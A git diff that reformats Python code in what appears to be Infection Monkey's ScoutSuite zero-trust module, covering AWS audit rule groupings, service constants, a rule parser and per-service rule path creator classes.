EC2Rules.SECURITY_GROUP_OPENS_TCP_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_UDP_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_RDP_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_SSH_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_MYSQL_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_MSSQL_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_MONGODB_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_ORACLE_DB_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_POSTGRESQL_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_NFS_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_SMTP_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_DNS_PORT_TO_ALL, + EC2Rules.SECURITY_GROUP_OPENS_ALL_PORTS_TO_SELF, + EC2Rules.SECURITY_GROUP_OPENS_ALL_PORTS, + EC2Rules.SECURITY_GROUP_OPENS_PLAINTEXT_PORT_FTP, + EC2Rules.SECURITY_GROUP_OPENS_PLAINTEXT_PORT_TELNET, + EC2Rules.SECURITY_GROUP_OPENS_PORT_RANGE, + EC2Rules.EC2_SECURITY_GROUP_WHITELISTS_AWS, + VPCRules.SUBNET_WITH_ALLOW_ALL_INGRESS_ACLS, + VPCRules.SUBNET_WITH_ALLOW_ALL_EGRESS_ACLS, + VPCRules.NETWORK_ACL_NOT_USED, + VPCRules.DEFAULT_NETWORK_ACLS_ALLOW_ALL_INGRESS, + VPCRules.DEFAULT_NETWORK_ACLS_ALLOW_ALL_EGRESS, + VPCRules.CUSTOM_NETWORK_ACLS_ALLOW_ALL_INGRESS, + VPCRules.CUSTOM_NETWORK_ACLS_ALLOW_ALL_EGRESS, + RDSRules.RDS_SECURITY_GROUP_ALLOWS_ALL, + RedshiftRules.REDSHIFT_SECURITY_GROUP_WHITELISTS_ALL, + ] test = zero_trust_consts.TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES class UnencryptedData(ScoutSuiteFindingMap): - rules = [EC2Rules.EBS_SNAPSHOT_NOT_ENCRYPTED, EC2Rules.EBS_VOLUME_NOT_ENCRYPTED, - EC2Rules.EC2_INSTANCE_WITH_USER_DATA_SECRETS, - ELBv2Rules.ELBV2_LISTENER_ALLOWING_CLEARTEXT, ELBv2Rules.ELBV2_OLDER_SSL_POLICY, - RDSRules.RDS_INSTANCE_STORAGE_NOT_ENCRYPTED, RedshiftRules.REDSHIFT_CLUSTER_DATABASE_NOT_ENCRYPTED, - RedshiftRules.REDSHIFT_PARAMETER_GROUP_SSL_NOT_REQUIRED, - S3Rules.S3_BUCKET_ALLOWING_CLEARTEXT, S3Rules.S3_BUCKET_NO_DEFAULT_ENCRYPTION, - ELBRules.ELB_LISTENER_ALLOWING_CLEARTEXT, - ELBRules.ELB_OLDER_SSL_POLICY] + rules = [ + EC2Rules.EBS_SNAPSHOT_NOT_ENCRYPTED, + EC2Rules.EBS_VOLUME_NOT_ENCRYPTED, + EC2Rules.EC2_INSTANCE_WITH_USER_DATA_SECRETS, + ELBv2Rules.ELBV2_LISTENER_ALLOWING_CLEARTEXT, + ELBv2Rules.ELBV2_OLDER_SSL_POLICY, + RDSRules.RDS_INSTANCE_STORAGE_NOT_ENCRYPTED, + RedshiftRules.REDSHIFT_CLUSTER_DATABASE_NOT_ENCRYPTED, + RedshiftRules.REDSHIFT_PARAMETER_GROUP_SSL_NOT_REQUIRED, + S3Rules.S3_BUCKET_ALLOWING_CLEARTEXT, + S3Rules.S3_BUCKET_NO_DEFAULT_ENCRYPTION, + ELBRules.ELB_LISTENER_ALLOWING_CLEARTEXT, + ELBRules.ELB_OLDER_SSL_POLICY, + ] test = zero_trust_consts.TEST_SCOUTSUITE_UNENCRYPTED_DATA class DataLossPrevention(ScoutSuiteFindingMap): - rules = [RDSRules.RDS_INSTANCE_BACKUP_DISABLED, RDSRules.RDS_INSTANCE_SHORT_BACKUP_RETENTION_PERIOD, - RDSRules.RDS_INSTANCE_SINGLE_AZ, S3Rules.S3_BUCKET_NO_MFA_DELETE, S3Rules.S3_BUCKET_NO_VERSIONING, - ELBv2Rules.ELBV2_NO_DELETION_PROTECTION] + rules = [ + RDSRules.RDS_INSTANCE_BACKUP_DISABLED, + RDSRules.RDS_INSTANCE_SHORT_BACKUP_RETENTION_PERIOD, + RDSRules.RDS_INSTANCE_SINGLE_AZ, + S3Rules.S3_BUCKET_NO_MFA_DELETE, + S3Rules.S3_BUCKET_NO_VERSIONING, + ELBv2Rules.ELBV2_NO_DELETION_PROTECTION, + ] test = zero_trust_consts.TEST_SCOUTSUITE_DATA_LOSS_PREVENTION @@ -91,7 +124,7 @@ class SecureAuthentication(ScoutSuiteFindingMap): IAMRules.IAM_ROOT_ACCOUNT_NO_MFA, IAMRules.IAM_ROOT_ACCOUNT_WITH_ACTIVE_KEYS, IAMRules.IAM_USER_NO_INACTIVE_KEY_ROTATION, - IAMRules.IAM_USER_WITH_MULTIPLE_ACCESS_KEYS + IAMRules.IAM_USER_WITH_MULTIPLE_ACCESS_KEYS, ] test = zero_trust_consts.TEST_SCOUTSUITE_SECURE_AUTHENTICATION @@ -153,7 +186,7 @@ class RestrictivePolicies(ScoutSuiteFindingMap): SNSRules.SNS_TOPIC_WORLD_ADDPERMISSION_POLICY, SESRules.SES_IDENTITY_WORLD_SENDRAWEMAIL_POLICY, SESRules.SES_IDENTITY_WORLD_SENDEMAIL_POLICY, - RedshiftRules.REDSHIFT_CLUSTER_PUBLICLY_ACCESSIBLE + RedshiftRules.REDSHIFT_CLUSTER_PUBLICLY_ACCESSIBLE, ] test = zero_trust_consts.TEST_SCOUTSUITE_RESTRICTIVE_POLICIES @@ -173,7 +206,7 @@ class Logging(ScoutSuiteFindingMap): ELBv2Rules.ELBV2_NO_ACCESS_LOGS, VPCRules.SUBNET_WITHOUT_FLOW_LOG, ConfigRules.CONFIG_RECORDER_NOT_CONFIGURED, - RedshiftRules.REDSHIFT_PARAMETER_GROUP_LOGGING_DISABLED + RedshiftRules.REDSHIFT_PARAMETER_GROUP_LOGGING_DISABLED, ] test = zero_trust_consts.TEST_SCOUTSUITE_LOGGING @@ -185,7 +218,7 @@ class ServiceSecurity(ScoutSuiteFindingMap): ELBv2Rules.ELBV2_HTTP_REQUEST_SMUGGLING, RDSRules.RDS_INSTANCE_CA_CERTIFICATE_DEPRECATED, RDSRules.RDS_INSTANCE_NO_MINOR_UPGRADE, - RedshiftRules.REDSHIFT_CLUSTER_NO_VERSION_UPGRADE + RedshiftRules.REDSHIFT_CLUSTER_NO_VERSION_UPGRADE, ] test = zero_trust_consts.TEST_SCOUTSUITE_SERVICE_SECURITY diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_findings_list.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_findings_list.py index d19c2b216..e66c47782 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_findings_list.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/scoutsuite_findings_list.py @@ -1,5 +1,19 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import RestrictivePolicies, \ - SecureAuthentication, DataLossPrevention, UnencryptedData, PermissiveFirewallRules, ServiceSecurity, Logging +from monkey_island.cc.services.zero_trust.scoutsuite.consts.scoutsuite_finding_maps import ( + RestrictivePolicies, + SecureAuthentication, + DataLossPrevention, + UnencryptedData, + PermissiveFirewallRules, + ServiceSecurity, + Logging, +) -SCOUTSUITE_FINDINGS = [PermissiveFirewallRules, UnencryptedData, DataLossPrevention, SecureAuthentication, - RestrictivePolicies, Logging, ServiceSecurity] +SCOUTSUITE_FINDINGS = [ + PermissiveFirewallRules, + UnencryptedData, + DataLossPrevention, + SecureAuthentication, + RestrictivePolicies, + Logging, + ServiceSecurity, +] diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/service_consts.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/service_consts.py index a31c83d3e..abbd48164 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/service_consts.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/consts/service_consts.py @@ -1,31 +1,31 @@ from enum import Enum -SERVICES = 'services' -FINDINGS = 'findings' +SERVICES = "services" +FINDINGS = "findings" class SERVICE_TYPES(Enum): - ACM = 'acm' - AWSLAMBDA = 'awslambda' - CLOUDFORMATION = 'cloudformation' - CLOUDTRAIL = 'cloudtrail' - CLOUDWATCH = 'cloudwatch' - CONFIG = 'config' - DIRECTCONNECT = 'directconnect' - EC2 = 'ec2' - EFS = 'efs' - ELASTICACHE = 'elasticache' - ELB = 'elb' - ELB_V2 = 'elbv2' - EMR = 'emr' - IAM = 'iam' - KMS = 'kms' - RDS = 'rds' - REDSHIFT = 'redshift' - ROUTE53 = 'route53' - S3 = 's3' - SES = 'ses' - SNS = 'sns' - SQS = 'sqs' - VPC = 'vpc' - SECRETSMANAGER = 'secretsmanager' + ACM = "acm" + AWSLAMBDA = "awslambda" + CLOUDFORMATION = "cloudformation" + CLOUDTRAIL = "cloudtrail" + CLOUDWATCH = "cloudwatch" + CONFIG = "config" + DIRECTCONNECT = "directconnect" + EC2 = "ec2" + EFS = "efs" + ELASTICACHE = "elasticache" + ELB = "elb" + ELB_V2 = "elbv2" + EMR = "emr" + IAM = "iam" + KMS = "kms" + RDS = "rds" + REDSHIFT = "redshift" + ROUTE53 = "route53" + S3 = "s3" + SES = "ses" + SNS = "sns" + SQS = "sqs" + VPC = "vpc" + SECRETSMANAGER = "secretsmanager" diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py index 935f1c989..134ed3500 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_parser.py @@ -2,8 +2,9 @@ from enum import Enum from common.utils.code_utils import get_value_from_dict from common.utils.exceptions import RulePathCreatorNotFound -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators_list import \ - RULE_PATH_CREATORS_LIST +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.rule_path_creators_list import ( + RULE_PATH_CREATORS_LIST, +) def __build_rule_to_rule_path_creator_hashmap(): @@ -18,7 +19,6 @@ RULE_TO_RULE_PATH_CREATOR_HASHMAP = __build_rule_to_rule_path_creator_hashmap() class RuleParser: - @staticmethod def get_rule_data(scoutsuite_data: dict, rule_name: Enum) -> dict: rule_path = RuleParser._get_rule_path(rule_name) @@ -34,5 +34,7 @@ class RuleParser: try: return RULE_TO_RULE_PATH_CREATOR_HASHMAP[rule_name] except KeyError: - raise RulePathCreatorNotFound(f"Rule path creator not found for rule {rule_name.value}. Make sure to assign" - f"this rule to any rule path creators.") + raise RulePathCreatorNotFound( + f"Rule path creator not found for rule {rule_name.value}. Make sure to assign" + f"this rule to any rule path creators." + ) diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/abstract_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/abstract_rule_path_creator.py index ee7f7c38b..56734e1a0 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/abstract_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/abstract_rule_path_creator.py @@ -2,12 +2,16 @@ from abc import ABC, abstractmethod from enum import Enum from typing import List, Type -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import RuleNameEnum -from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import FINDINGS, SERVICE_TYPES +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rule_name_enum import ( + RuleNameEnum, +) +from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import ( + FINDINGS, + SERVICE_TYPES, +) class AbstractRulePathCreator(ABC): - @property @abstractmethod def service_type(self) -> SERVICE_TYPES: @@ -20,5 +24,5 @@ class AbstractRulePathCreator(ABC): @classmethod def build_rule_path(cls, rule_name: Enum) -> List[str]: - assert(rule_name in cls.supported_rules) + assert rule_name in cls.supported_rules return [cls.service_type.value, FINDINGS, rule_name.value] diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py index 10adb474c..40e438eba 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudformation_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudformation_rules import CloudformationRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudformation_rules import ( + CloudformationRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class CloudformationRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py index 2f626dfd5..928cd138e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudtrail_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudtrail_rules import CloudTrailRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudtrail_rules import ( + CloudTrailRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class CloudTrailRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py index f6d4d673d..4d45c878e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/cloudwatch_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudwatch_rules import CloudWatchRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.cloudwatch_rules import ( + CloudWatchRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class CloudWatchRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py index 59a2e49eb..b5607cbe8 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/config_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.config_rules import ConfigRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.config_rules import ( + ConfigRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class ConfigRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py index 4a37b0a7e..8d951f656 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ec2_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ec2_rules import EC2Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class EC2RulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py index a38ae2881..4af6e351b 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elb_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elb_rules import ELBRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class ELBRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py index 2472bf076..935a8678e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/elbv2_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.elbv2_rules import ELBv2Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class ELBv2RulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py index a601cb9cd..f355dd8e2 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/iam_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.iam_rules import IAMRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class IAMRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py index 0b8bf54af..be4b043d7 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/rds_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.rds_rules import RDSRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class RDSRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py index 4de7016a4..dfa954638 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/redshift_rule_path_creator.py @@ -1,7 +1,10 @@ -from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.redshift_rules import RedshiftRules +from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.redshift_rules import ( + RedshiftRules, +) from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class RedshiftRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py index 4c0a0dccc..f06b2554f 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/s3_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.s3_rules import S3Rules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class S3RulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py index c7cac2bce..7ded2918f 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/ses_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.ses_rules import SESRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class SESRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py index 60a2f5b1c..6eda4fcef 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sns_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.sns_rules import SNSRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class SNSRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py index 619cf2ddb..e4979caf5 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/sqs_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.sqs_rules import SQSRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class SQSRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py index 280d0933e..9daad607e 100644 --- a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py +++ b/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators/vpc_rule_path_creator.py @@ -1,7 +1,8 @@ from monkey_island.cc.services.zero_trust.scoutsuite.consts.rule_names.vpc_rules import VPCRules from monkey_island.cc.services.zero_trust.scoutsuite.consts.service_consts import SERVICE_TYPES -from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import \ - AbstractRulePathCreator +from monkey_island.cc.services.zero_trust.scoutsuite.data_parsing.rule_path_building.abstract_rule_path_creator import ( + AbstractRulePathCreator, +) class VPCRulePathCreator(AbstractRulePathCreator): diff --git a/monkey/monkey_island/cc/services/zero_trust/scoutsuite/data_parsing/rule_path_building/rule_path_creators_list.py 